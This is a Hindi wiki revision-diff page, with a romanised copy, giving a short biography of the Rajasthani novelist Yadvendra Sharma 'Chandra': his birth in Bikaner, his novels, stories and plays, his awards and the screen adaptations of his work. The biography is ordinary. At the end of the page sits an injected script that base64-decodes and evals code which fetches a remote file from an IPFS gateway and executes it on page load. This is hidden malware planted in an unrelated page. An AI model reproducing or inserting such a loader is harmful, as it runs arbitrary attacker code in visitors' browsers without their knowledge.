Difference between revisions of "यादवेन्द्र शर्मा 'चन्द्र'"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''यादवेन्द्र शर्मा 'चन्द्र'''' (जन्म- 1932, बीकानेर, [[राज...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
'''यादवेन्द्र शर्मा 'चन्द्र'''' (जन्म- [[1932]], [[बीकानेर]], [[राजस्थान]]; मृत्यु- [[3 मार्च]], [[2009]], [[जयपुर]]) राजस्थान के सर्वाधिक चर्चित व प्रसिद्ध उपन्यासकार थे। इन्होंने राजस्थान की सामंती पृष्ठभूमि पर अनेक सशक्त उपन्यास लिखे थे। उनके उपन्यास ‘खम्मा अन्नदाता’, ‘मिट्टी का कलंक’, ‘जनानी ड्योढी’, ‘एक और मुख्यमंत्री’ तथा ‘हज़ार घोड़ों का सवार’ आदि में सामंती प्रथा के पोषक राजाओं व जागीरदारों के अंतरंग के खोखलेपन, षड़यंत्रों व कुंठाओं पर जमकर प्रहार किये गए हैं। [[राजस्थानी भाषा]] की पहली रंगीन फ़िल्म 'लाजराखो राणी सती' की कथा यादवेन्द्र शर्मा 'चन्द्र' ने ही लिखी थी। [[हिन्दी भाषा]] में लिखने वाले राजस्थानी लेखकों में यादवेन्द्र शर्मा 'चन्द्र' सबसे अग्रणी रहे।
+
'''यादवेन्द्र शर्मा 'चन्द्र'''' (जन्म- [[1932]], [[बीकानेर]], [[राजस्थान]]; मृत्यु- [[3 मार्च]], [[2009]], [[जयपुर]]) राजस्थान के सर्वाधिक चर्चित व प्रसिद्ध उपन्यासकार थे। इन्होंने राजस्थान की सामंती पृष्ठभूमि पर अनेक सशक्त उपन्यास लिखे थे। उनके उपन्यास ‘खम्मा अन्नदाता’, ‘मिट्टी का कलंक’, ‘जनानी ड्योढी’, ‘एक और मुख्यमंत्री’ तथा ‘हज़ार घोड़ों पर सवार’ आदि में सामंती प्रथा के पोषक राजाओं व जागीरदारों के अंतरंग के खोखलेपन, षड़यंत्रों व कुंठाओं पर जमकर प्रहार किये गए हैं। [[राजस्थानी भाषा]] की पहली रंगीन फ़िल्म 'लाजराखो राणी सती' की कथा यादवेन्द्र शर्मा 'चन्द्र' ने ही लिखी थी। [[हिन्दी भाषा]] में लिखने वाले राजस्थानी लेखकों में यादवेन्द्र शर्मा 'चन्द्र' सबसे अग्रणी रहे।
 
==जन्म==
 
==जन्म==
 
यादवेन्द्र शर्मा 'चन्द्र' जी का जन्म ब्रिटिशकालीन भारत में 1932 में राजस्थान के बीकानेर में हुआ था।
 
यादवेन्द्र शर्मा 'चन्द्र' जी का जन्म ब्रिटिशकालीन भारत में 1932 में राजस्थान के बीकानेर में हुआ था।
 
==कृतियाँ==
 
==कृतियाँ==
 +
यादवेन्द्र शर्मा 'चन्द्र' ने अपनी लेखनी से समाज को नई दिशा देने के लिए जीवन पर्यन्त सादगी व ईमानदारी से सृजन कार्य तथा [[धर्म]] का निर्वाह किया। उन्होंने [[उपन्यास]], कहानियाँ, [[कविता]] संग्रह एवं लघु नाटकों की 100 से भी ज़्यादा पुस्तकों की रचना कर [[साहित्य]] के क्षेत्र में अपना अपूर्व योगदान दिया, जो सदैव एक मिसाल के रूप में जीवंत रहेगा।<ref>{{cite web |url= http://kavitakosh.org/kk/%E0%A4%AF%E0%A4%BE%E0%A4%A6%E0%A4%B5%E0%A5%87%E0%A4%82%E0%A4%A6%E0%A5%8D%E0%A4%B0_%E0%A4%B6%E0%A4%B0%E0%A5%8D%E0%A4%AE%E0%A4%BE_%27%E0%A4%9A%E0%A4%82%E0%A4%A6%E0%A5%8D%E0%A4%B0%27_/_%E0%A4%AA%E0%A4%B0%E0%A4%BF%E0%A4%9A%E0%A4%AF|title= यादवेन्द्र शर्मा 'चन्द्र'/परिचय|accessmonthday= 09 अगस्त|accessyear= 2014|last= |first= |authorlink= |format= |publisher= कविताकोश|language= हिन्दी}} उनकी कुछ कृतियाँ निम्नलिखित हैं-</ref>
 +
 
'''पुस्तक''' - 'तेरा मेरा उसका सच', 'आँखें सब देखती हैं' (कविता संग्रह) के अतिरिक्त गद्य की अनेकानेक पुस्तकें।
 
'''पुस्तक''' - 'तेरा मेरा उसका सच', 'आँखें सब देखती हैं' (कविता संग्रह) के अतिरिक्त गद्य की अनेकानेक पुस्तकें।
  
 
'''उपन्‍यास''' - 'सन्‍यासी और सुंदरी', 'दीया जला दीया बुझा', 'हजार घोडों पर सवार', 'कुर्सी गायब हो गई', 'एक और मुख्‍यमंत्री', 'खम्‍मा अन्‍नदाता', 'पराजिता', 'खून का टीका', 'ढोकन कुंजकली', 'गुलाबडी', 'सपना', 'मोहभंग' आदि।
 
'''उपन्‍यास''' - 'सन्‍यासी और सुंदरी', 'दीया जला दीया बुझा', 'हजार घोडों पर सवार', 'कुर्सी गायब हो गई', 'एक और मुख्‍यमंत्री', 'खम्‍मा अन्‍नदाता', 'पराजिता', 'खून का टीका', 'ढोकन कुंजकली', 'गुलाबडी', 'सपना', 'मोहभंग' आदि।
  
'''कहानी संग्रह''' - मेरी प्रेम कहानियां, श्रेष्‍ठ आंचलिक कहानियां, विशिष्‍ठ कहानियां, जमीन का टुकडा, जंजाल तथा अन्‍य कहानियां, महापुरुष आदि अनेक कथासंग्रह
+
'''कहानी संग्रह''' - 'मेरी प्रेम कहानियां', 'श्रेष्‍ठ आंचलिक कहानियां', 'विशिष्‍ठ कहानियां', 'जमीन का टुकडा', 'जंजाल' तथा अन्‍य कहानियां, 'महापुरुष' आदि अनेक कथा संग्रह।
  
'''नाटक''' - ताश का घर, महाराजा शेखचिल्‍ली, मैं अश्‍वत्‍थामा, चुप हो जाए पीटर, चार अजूबे, आखिरी पडाव, जीमूतवाहन, महाबली बर्बरिक आदि
+
'''नाटक''' - 'ताश का घर', 'महाराजा शेखचिल्‍ली', 'मैं अश्‍वत्‍थामा', 'चुप हो जाए पीटर', 'चार अजूबे', 'आखिरी पड़ाव', 'जीमूतवाहन', 'महाबली बर्बरिक' आदि।
 
==सम्‍मान==
 
==सम्‍मान==
 
राजस्‍थान पत्रिका सृजन पुरस्‍कार की श्रेणी में वर्ष 1996 में 'गुळजी गाथा' पर पुरस्‍कृत, साहित्‍य महोपाध्‍याय, साहित्‍यश्री, डॉ राहुल सांकृत्‍यायन, साहित्‍य महोपाध्‍याय आदि
 
राजस्‍थान पत्रिका सृजन पुरस्‍कार की श्रेणी में वर्ष 1996 में 'गुळजी गाथा' पर पुरस्‍कृत, साहित्‍य महोपाध्‍याय, साहित्‍यश्री, डॉ राहुल सांकृत्‍यायन, साहित्‍य महोपाध्‍याय आदि
  
विशेष - आपके उपन्यास 'हजार घोडों पर सवार' पर टीवी धारावाहिक बना, 'लाज राखो राणी सती' नामक पहली राजस्‍थानी फिल्‍म भी 'चंद्र' के लेखन का परिणाम थी, गुलाबडी, चकवे की बात और विडम्‍बना पर टेलीफिल्‍म बनी।
+
'''विशेष'''<br />
 +
यादवेन्द्र शर्मा 'चन्द्र' के उपन्यास 'हज़ार घोडों पर सवार' पर टीवी धारावाहिक बना था, 'लाज राखो राणी सती' नामक पहली राजस्‍थानी फ़िल्‍म भी इनके लेखन का ही परिणाम थी। 'गुलाबडी', 'चकवे की बात' और 'विडम्‍बना' पर भी टेलीफ़िल्‍म का निर्माण हुआ था।
  
  

Revision as of 05:58, 9 August 2014

yadavendr sharma 'chandr' (janm- 1932, bikaner, rajasthan; mrityu- 3 march, 2009, jayapur) rajasthan ke sarvadhik charchit v prasiddh upanyasakar the. inhoanne rajasthan ki samanti prishthabhoomi par anek sashakt upanyas likhe the. unake upanyas ‘khamma annadata’, ‘mitti ka kalank’, ‘janani dyodhi’, ‘ek aur mukhyamantri’ tatha ‘hazar gho doan par savar’ adi mean samanti pratha ke poshak rajaoan v jagiradaroan ke aantarang ke khokhalepan, sh dayantroan v kuanthaoan par jamakar prahar kiye ge haian. rajasthani bhasha ki pahali rangin film 'lajarakho rani sati' ki katha yadavendr sharma 'chandr' ne hi likhi thi. hindi bhasha mean likhane vale rajasthani lekhakoan mean yadavendr sharma 'chandr' sabase agrani rahe.

janm

yadavendr sharma 'chandr' ji ka janm britishakalin bharat mean 1932 mean rajasthan ke bikaner mean hua tha.

kritiyaan

yadavendr sharma 'chandr' ne apani lekhani se samaj ko nee disha dene ke lie jivan paryant sadagi v eemanadari se srijan kary tatha dharm ka nirvah kiya. unhoanne upanyas, kahaniyaan, kavita sangrah evan laghu natakoan ki 100 se bhi zyada pustakoan ki rachana kar sahity ke kshetr mean apana apoorv yogadan diya, jo sadaiv ek misal ke roop mean jivant rahega.[1]

pustak - 'tera mera usaka sach', 'aankhean sab dekhati haian' (kavita sangrah) ke atirikt gady ki anekanek pustakean.

upanh‍yas - 'sanh‍yasi aur suandari', 'diya jala diya bujha', 'hajar ghodoan par savar', 'kursi gayab ho gee', 'ek aur mukhh‍yamantri', 'khamh‍ma anh‍nadata', 'parajita', 'khoon ka tika', 'dhokan kuanjakali', 'gulabadi', 'sapana', 'mohabhang' adi.

kahani sangrah - 'meri prem kahaniyaan', 'shreshh‍th aanchalik kahaniyaan', 'vishishh‍th kahaniyaan', 'jamin ka tukada', 'janjal' tatha anh‍y kahaniyaan, 'mahapurush' adi anek katha sangrah.

natak - 'tash ka ghar', 'maharaja shekhachilh‍li', 'maian ashh‍vath‍thama', 'chup ho jae pitar', 'char ajoobe', 'akhiri p dav', 'jimootavahan', 'mahabali barbarik' adi.

samh‍man

rajash‍than patrika srijan purash‍kar ki shreni mean varsh 1996 mean 'guळji gatha' par purash‍krit, sahith‍y mahopadhh‍yay, sahith‍yashri, d aau rahul saankrith‍yayan, sahith‍y mahopadhh‍yay adi

vishesh
yadavendr sharma 'chandr' ke upanyas 'hazar ghodoan par savar' par tivi dharavahik bana tha, 'laj rakho rani sati' namak pahali rajash‍thani filh‍m bhi inake lekhan ka hi parinam thi. 'gulabadi', 'chakave ki bat' aur 'vidamh‍bana' par bhi telifilh‍m ka nirman hua tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. yadavendr sharma 'chandr'/parichay (hindi) kavitakosh. abhigaman tithi: 09 agast, 2014. unaki kuchh kritiyaan nimnalikhit haian-

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>